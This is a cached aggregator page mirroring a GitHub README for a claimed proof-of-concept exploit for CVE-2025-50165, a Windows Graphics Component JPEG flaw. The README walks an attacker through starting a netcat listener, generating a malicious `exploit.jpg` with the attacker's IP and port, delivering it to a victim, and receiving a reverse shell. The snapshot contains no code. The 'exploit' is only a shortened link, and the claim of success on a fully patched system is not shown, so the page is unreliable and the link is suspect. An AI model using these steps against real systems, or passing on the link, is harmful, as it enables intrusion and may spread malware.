Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-50165 PoC — Microsoft Graphics Component 安全漏洞

Source
https://github.com/callinston/CVE-2025-50165
Associated Vulnerability
Title:Microsoft Graphics Component 安全漏洞 (CVE-2025-50165)
Description:Microsoft Graphics Component是美国微软(Microsoft)公司的图形驱动组件。 Microsoft Graphics Component存在安全漏洞。攻击者利用该漏洞可以执行代码。以下产品和版本受到影响:Windows Server 2025 (Server Core installation),Windows 11 Version 24H2 for ARM64-based Systems,Windows 11 Version 24H2 for x64-based Syste
Readme
## Proof-of-Concept exploit for the Untrusted Pointer Dereference vulnerability in Windows Graphics Component (CVE-2025-50165).

   

### **Disclaimer**

This tool is intended for security research and educational purposes only. Any use of this code for malicious activities is strictly prohibited. The author is not responsible for any misuse or damage caused by this program. Use at your own risk.

### **Technical Analysis**

The vulnerability exists within the Windows Graphics Component, specifically in the parsing of specially crafted image files. This exploit targets the JPEG decoding process. By embedding a malformed metadata segment within a JPEG file, an attacker can trigger an untrusted pointer dereference (CWE-822).

The core of the exploit involves crafting a JPEG file that, when rendered, causes the codec to read from a controlled memory address and execute its contents. This is achieved through heap spraying, where the payload is placed into a predictable memory location. The malformed segment then points the instruction pointer to our shellcode, resulting in remote code execution on the target system without any user interaction. The attack vector is viable through web browsers, email clients, and any application that utilizes the underlying Windows API for rendering JPEG images.

### **Usage**

The exploit is generated using a Python script. It creates a malicious `.jpg` file that will trigger the vulnerability.

1.  **Set up a listener** to receive the reverse shell. Netcat is a simple option:

    ```bash
    nc -lvnp 4444
    ```

2.  **Generate the exploit image:**
    Run the `generate_payload.py` script, providing your listener's IP address and port.

    ```bash
    python3 generatepayload.py --lhost <your_ip> --lport 4444 --output exploit.jpg
    ```

3.  **Deliver the payload.**
    Transfer the `exploit.jpg` file to the victim machine. The vulnerability will be triggered as soon as the file is processed for display (e.g., viewing it in a folder with thumbnails enabled, opening it in an image viewer, or embedding it on a webpage).

4.  **Receive the connection.**
    Your listener should receive a connection from the victim machine, providing a remote command shell.

### **Demo**

The following demonstration shows the exploit in action. A listener is started on the attacker's machine. The generated `exploit.jpg` file is opened on a fully patched Windows 11 24H2 machine, and a reverse shell is immediately established.

`demo.mp4`

### Exploit
[href](https://tinyurl.com/3cyha48t)

For any inquiries, please email me at: anthonmullins@op.pl
File Snapshot

 [4.0K]  /data/pocs/fc0d385c361f945b519f8721f85eb5de4871d5f6
└── [2.5K]  README.md

1 directory, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.